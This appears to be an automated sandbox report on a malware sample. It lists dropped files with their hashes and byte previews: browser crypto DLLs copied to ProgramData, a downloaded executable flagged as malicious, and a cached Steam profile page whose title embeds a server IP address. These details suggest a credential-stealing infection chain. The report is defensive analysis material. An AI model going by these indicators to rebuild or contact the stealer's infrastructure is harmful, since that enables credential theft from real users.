Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.4.1.1.1.4.9.5.2.3.1.0.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.4.1.1.1.5.0.3.1.9.9.7.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.4.4.9.7.6.b.-.f.5.d.b.-.4.d.e.9.-.a.8.f.1.-.4.a.0.f.d.9.b.d.7.2.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.7.4.b.8.d.c.-.5.3.4.b.-.4.6.b.9.-.8.8.7.1.-.7.9.1.e.9.1.c.1.e.f.1.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.6.8.-.0.0.0.1.-.0.0.1.4.-.8.3.c.5.-.f.7.9.8.4.6.0.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Sep 21 16:52:17 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	106890
Entropy (8bit):	2.0353096375097324
Encrypted:	false
SSDEEP:	384:SgJVE5Hn7R9/jknWFVByk5uA2KcfjXSWGBi113QshecjY6NmKEnrIa:Fy5nt9/gnSVgkXcfj+smKra
MD5:	C506852803857B404ACE467616AD37A0
SHA1:	54D898E9DF59560BD3668A717BA10FD852DD9B38
SHA-256:	2E467AC0D671C7031CA523AD2BF619D9D29F51D91CF77ECF5D5B2B5235640F9F
SHA-512:	CA32B2C07617E84762D6AD43ADDE10797131125755C78709EAA24F66CE0F022BDAD85FDD894657000BE449AB9C7A7936149FE1948E5B4B30B5CFB6DD38F71F6F
Malicious:	false
Preview:	MDMP..a..... ..........f....................................l...L%......T...2J..........`.......8...........T...........pE...\...........%...........'..............................................................................eJ......<(......GenuineIntel............T.......h......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3274.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Sat Sep 21 16:52:29 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	42972
Entropy (8bit):	2.6328077020052993
Encrypted:	false
SSDEEP:	192:NGwpSD798jipixHO5Hn7qHx6GNNqi6mbmlBmNMpzJUnJFjl9lD2U:0n98jRU5HnCxtNNd/4M+AnJhlC
MD5:	AE1845D4489DD6E8B0879BC61E61F5F7
SHA1:	533B36975A68FF97F755D6E265FDAD54EAFCA7E2
SHA-256:	6A83F2F0C04F71BD8E6BD734B5DA81D1281D2BEA3D87FFD8CF96656D68D3F83C
SHA-512:	184ABEA993B6FCAC9404F4684DC86625A26A0D33A19185C187A3CB0792A11C0699EAA8004F4C1E37069D1F13415BC0E874095988BE015AD58412C60C0F59CDDC
Malicious:	false
Preview:	MDMP..a..... ..........f............4...............H.......l....#......$....2..........`.......8...........T........... E...b..........h$..........T&..............................................................................eJ.......&......GenuineIntel............T.......h......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3498.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6296
Entropy (8bit):	3.6994569550332836
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbn+6kYJhHYYGVhtE5aM4US89b/gsfOVm:R6l7wVeJn+6BPYYG+prS89b/gsfOVm
MD5:	94DE995EBE0722F03D17DFA734EED1ED
SHA1:	2F84C45E6DEC866C02955A08D90715801B3BA6AB
SHA-256:	3701BC0D4F804BFB863ABCFA95EFA563DFD83C37E3B5D8333839E50DEBDB5FB8
SHA-512:	54E46B812334A19B6A577D6C973682AADD85519D46995681BB78378137F5E81BC4F52847720EA7B1FA17CB47AE99090C565E332F47295EE21ECCAE336D6650E8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER34F6.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4628
Entropy (8bit):	4.451234964175093
Encrypted:	false
SSDEEP:	48:cvIwWl8zsyJg77aI9j4WpW8VYjGBYm8M4JfuKsPFT98+q8orv5QgLuOLu3rd:uIjfAI7lx7V7gJfudMvrBBuku3rd
MD5:	3A11038DB1097D96A3E21ADA05731D36
SHA1:	EA70429D3DEC47F24207D9BFDA4190F8E735EC48
SHA-256:	2E7EF38FCB634D801A9DD9924DA20B3BA809E6232D2A6F0687265BAC15E9F08E
SHA-512:	6E9B563D66F09A3DD2BE04798C80D980F2CA2874599748673354D66B051821E79DFFE221FB8F92C8E0E5FB5AC1F2156031EC06BB8E127E6F8633965FF290510D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="510235" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER412.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6348
Entropy (8bit):	3.712861975354736
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbn06GYYJaAtE5aMQUt89biosfqWm:R6l7wVeJn06GYYJa/pDt89biosfqWm
MD5:	A92A46CAEA03C1200D042FCAEB81C680
SHA1:	E58E40C7CF6DA550F5339A699D1AB717EFFB8603
SHA-256:	096DE2817CE07AE892FDE7C7FD86E38E4C7385F6AC85DA2610B2BC301BD745CD
SHA-512:	7ABD712DD94B5AF7EEC9B751332CD2A618FF2FF7A43AA8B1E66631D65ED641E7768957DA578F34364636FA696E406D2AD82E68CAD8024A296C0F7ED2DBD462EA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER461.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4737
Entropy (8bit):	4.435474597140172
Encrypted:	false
SSDEEP:	48:cvIwWl8zsJrJg77aI9j4WpW8VYjkYm8M4JfuKleFMQI+q8vsKlcQgLuOLu3rd:uIjfJFI7lx7VQJfuEfKsEcBuku3rd
MD5:	D7AF62F811DB097AFE2A062BC1FEFE1B
SHA1:	AB2D6C33CBD2F25C818145AA851CCA0BA46E950C
SHA-256:	1D6820F2E40D3888FFE7B22203F22D19C6BDC0D186B6FD1E818D1193718ADDCC
SHA-512:	65FA0D13D1A17ADD74D36E88B1E90810C83F2EB6B4518E16F1DF4249DB104352586FE760B283CA38E0E7F2A4697AA75AFF230DBEF529707D579061F07CBEBAA7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="510234" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Evo-gen.12679.2695.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BKKKEGIDBG.exe.log

Download File

Process:	C:\ProgramData\BKKKEGIDBG.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34740
Entropy (8bit):	5.400110699300573
Encrypted:	false
SSDEEP:	768:Rdpqme0Ih3tAA6WG1IfcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2SV:Rd8me0Ih3tAA6WG1IFhTBv++nIjBtPFE
MD5:	DE4B61F5ED998AE0B5247C931BE806C6
SHA1:	B24C9C3126AB0634AFB9B9B9FBADEC9531397F99
SHA-256:	9E6199E92FD5D69EF93F2C50DF4707BC0460B5A1033D33320130D52180824E56
SHA-512:	6E3A680D78E02B8E1ED0C21891A3B260BF3809F525AA2B7C6BF045C98F40CC64F738661F9234D105FBE22223462901A9BA449D8F416286F000B6ED56A9BC6E3C
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://116.203.165.127\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link h

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66eef0ca0fb35_lfdsa[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	390560
Entropy (8bit):	7.988272312465221
Encrypted:	false
SSDEEP:	6144:1v60lgEVBlU2GTOMzuC/cuVXRCEPZG03ZrkZdlBF4P+/G1GB64iL7yMsEO:1vBLblUlH5LXPZd3Z4ZdlBWPsQGB64iQ
MD5:	F5A1956973DCE107D4C0B6267CE88870
SHA1:	79A19513D7C9CFF939F2881C4172A05DBAEF735B
SHA-256:	7B794C5BDB820791F0359DA90A9A4F258412B8FEEF9C6E6A0411F6AEAD9D3A04
SHA-512:	F42180C75C0AE8DC083C6FFF98A66C0D875FADB400D7945816EA330A54777632A3A7752D3E78B90E45F58ED3D04D6708B1DCEA51D82711356E6D14E405A7C579
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................^.... ........@.. ....................................`.....................................S...................x...(&.......................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................@.......H.........................................................................^N.m.Tl.C.zO3&1V.H.._...&....`{.5...(..."..........UNir[H..c.{..9...i..30...\:.d"D}.ZJ.3H..............f..TW.v..i5.mh.W.z....!......."..t.'....Ll...,).;.V..96.e.F.a.../.T.....x...5....d...,Ur.9.8.~av..\N6..a.$.q....c.....-.....T..M^...)L".....V.....q..>.....Ep..o>.y...R.!....4 ....P.s."..j1....]...HL.lM..D..T.2.T...../..k&].=S..Fq.m..`..N. .+nC.I.U./;V...I..*K.O.pG .k..:.7#...(.

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:nnZ:Z
MD5:	C81621BCF5C5178D3A658B0871D4D763
SHA1:	952953063B71F0B4EAC1E87586F29C5CD762B8B8
SHA-256:	298A5E5EFE6B19F1C2228C599C92B8D6BF38EDFC4E1AA831B4D2B9FD9302DF5D
SHA-512:	4718071CB5AE98DDC27DC90F84018C4381A3165BA375EC5201FEAA88863CE6A16685F67A6E68D52DB694BC95AE3930F140E6C830DC51E69726C945C8CA5D379E
Malicious:	false
